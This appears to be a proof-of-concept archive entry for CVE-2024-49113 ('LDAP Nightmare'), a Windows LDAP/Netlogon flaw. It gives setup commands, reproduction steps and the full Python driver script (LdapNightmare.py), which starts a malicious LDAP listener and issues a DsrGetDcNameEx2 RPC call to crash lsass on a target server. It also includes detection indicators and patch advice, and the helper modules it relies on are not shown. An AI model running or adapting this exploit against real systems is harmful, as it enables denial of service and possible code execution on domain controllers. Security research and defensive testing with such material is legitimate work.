PoC Archive PoC Archive
Critical CVE-2024-49113 patched

LDAP Nightmare — Windows LDAP Client RCE/DoS (CVE-2024-49113)

by SafeBreach Labs (Or Yair, Shahak Morag); CVE reported by Yuki Chen · 2026-05-15

Severity
Critical
CVE
CVE-2024-49113
Category
network
Affected product
Microsoft Windows LDAP client / Netlogon interaction path
Affected versions
Windows Server systems affected by CVE-2024-49113 (vendor-specific vulnerable builds)
Disclosed
2026-05-15
Patch status
patched

Metadata

FieldValue
Date Added2026-05-15
Author / ResearcherSafeBreach Labs (Or Yair, Shahak Morag); CVE reported by Yuki Chen
CVE / AdvisoryCVE-2024-49113
Categorynetwork
SeverityCritical
CVSS ScoreN/A
StatusWeaponized
TagsLDAP, NRPC, Windows Server, unauthenticated, DoS, potential-RCE

Affected Target

FieldValue
Software / SystemMicrosoft Windows LDAP client / Netlogon interaction path
Versions AffectedWindows Server systems affected by CVE-2024-49113 (vendor-specific vulnerable builds)
Language / PlatformPython PoC targeting Windows Server environments
Authentication RequiredNo
Network Access RequiredYes

Summary

LDAP Nightmare is a public PoC for CVE-2024-49113, a critical vulnerability in Windows LDAP client behavior that can be reached through Netlogon workflow interactions. The PoC starts a malicious LDAP service and triggers victim-side LDAP resolution via DsrGetDcNameEx2, then returns crafted data intended to trigger vulnerable handling. In observed PoC behavior, successful exploitation can crash the target (lsass/Netlogon path), and Microsoft classifies the issue as capable of remote code execution.


Vulnerability Details

Root Cause

The vulnerable flow involves unsafe processing in the Windows LDAP client path when handling attacker-influenced LDAP referral/response data reached during domain controller discovery logic. By controlling server responses, an attacker can trigger invalid state handling in the victim process.

Attack Vector

An attacker exposes a malicious LDAP server and invokes DsrGetDcNameEx2 against the target over Netlogon RPC so the target queries attacker-controlled LDAP records. Crafted LDAP data in that response path is then used to trigger the vulnerability.

Impact

  • Remote crash / denial-of-service of vulnerable Windows Server systems.
  • Service instability tied to Netlogon/LSASS processing path.
  • Potential remote code execution risk according to vendor advisory/CVE classification.

Environment / Lab Setup

OS:          Attacker on Linux/macOS/Windows with Python 3
Target:      Vulnerable Windows Server in authorized lab domain environment
Attacker:    Host reachable by target over required RPC/LDAP paths
Tools:       python3, impacket, responder dependencies from PoC

Setup Steps

1
2
3
4
5
cd pocs/network/2026-05-15_ldap-nightmare-cve-2024-49113
python3 -m venv .venv
source .venv/bin/activate
pip install impacket pyasn1 pycryptodome pyOpenSSL responder
python3 LdapNightmare.py <target_ip> --domain-name <attacker-controlled-domain>

Proof of Concept

Step-by-Step Reproduction

  1. Prepare attacker DNS domain/SRV records so target LDAP discovery points to the attacker host.
  2. Start the PoC and its malicious LDAP server listener.
  3. Trigger DsrGetDcNameEx2 against the vulnerable target using the crafted domain input.
  4. Observe target connection reset/crash behavior indicating the vulnerable path was triggered.

Exploit Code

See LdapNightmare.py, exploit_server.py, and rpc_call.py in this folder.

1
2
3
4
5
6
7
8
9
from rpc_call import DsrGetDcNameEx2

DsrGetDcNameEx2(
    target_ip="192.0.2.10",
    port=49664,
    account="Administrator",
    site_name="",
    domain_name="example.com",
)

Expected Output

INFO: Waiting for udp server to start...
INFO: Calling DsrGetDcNameEx2 now...
INFO: Successfuly triggered the vulnerability!

Screenshots / Evidence

  • screenshots/ — add authorized lab captures of RPC call, malicious LDAP interaction, and target failure signal.

Detection & Indicators of Compromise

- Unexpected outbound LDAP lookups to untrusted domains/hosts from domain controllers
- Netlogon RPC calls invoking unusual DsrGetDcNameEx2 parameters
- LSASS/Netlogon crashes or restarts correlated with attacker-controlled LDAP responses

SIEM / IDS Rule (example):

Alert on domain controllers performing LDAP SRV resolution and LDAP traffic to
non-approved external domains immediately after NRPC DsrGetDcNameEx2 activity.

Remediation

ActionDetail
PatchApply Microsoft security updates addressing CVE-2024-49113 on all affected systems
WorkaroundRestrict outbound LDAP/related lookup paths from critical servers to trusted infrastructure only
Config HardeningMonitor and limit anomalous Netlogon/DC-discovery behavior; segment DC egress where possible

References


Notes

Auto-ingested from https://github.com/SafeBreach-Labs/CVE-2024-49113 on 2026-05-15.

LdapNightmare.py
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
# For authorized security research and educational use only.
# Do not use against systems or networks without explicit permission.

import time
import asyncio
import argparse
import threading

from logger import logger
from rpc_call import DsrGetDcNameEx2
from exploit_server import run_exploit_server

def start_ldap_server(listen_port: int):
    """Run the async LDAP server in this thread."""
    asyncio.run(run_exploit_server(listen_port))

def main():
    parser = argparse.ArgumentParser(
        description="Call NRPC DsrGetDcNameEx2 via Impacket"
    )
    parser.add_argument("target_ip", help="Target IP address (required)")
    parser.add_argument(
        "--port", "-p",
        type=int,
        default=49664,
        help="TCP port for RPC (default: 49664)"
    )
    parser.add_argument(
        "--listen-port", "-l",
        type=int,
        default=389,
        help="UDP port for exploit server listen (default: 389)"
    )
    parser.add_argument(
        "--domain-name", "-d",
        required=True,
        help="DomainName parameter"
    )
    parser.add_argument(
        "--account", "-a",
        default="Administrator",
        help="AccountName parameter (default: Administrator)"
    )
    parser.add_argument(
        "--site-name", "-s",
        default="",
        help="SiteName parameter (default: empty string)"
    )

    args = parser.parse_args()

    # 1. Start the exploit server in a background thread.
    server_thread = threading.Thread(target=start_ldap_server, daemon=True, args=(args.listen_port,))
    server_thread.start()

    # 2. Optionally, wait a moment to ensure server is listening
    logger.info("Waiting for udp server to start...")
    time.sleep(2)  

    # 3. Now call your RPC function
    logger.info("Calling DsrGetDcNameEx2 now...")
    try:
        DsrGetDcNameEx2(
            target_ip=args.target_ip,
            port=args.port,
            account=args.account,
            site_name=args.site_name,
            domain_name=args.domain_name
        )
        logger.error("Failed to trigger the vulnerability!")
    except ConnectionResetError:
        # Netlogon is implemented inside the lsass.exe process,
        # So the connection will be reset after the exploit is triggered.
        logger.info("Successfuly triggered the vulnerability!")


if __name__ == "__main__":
    main()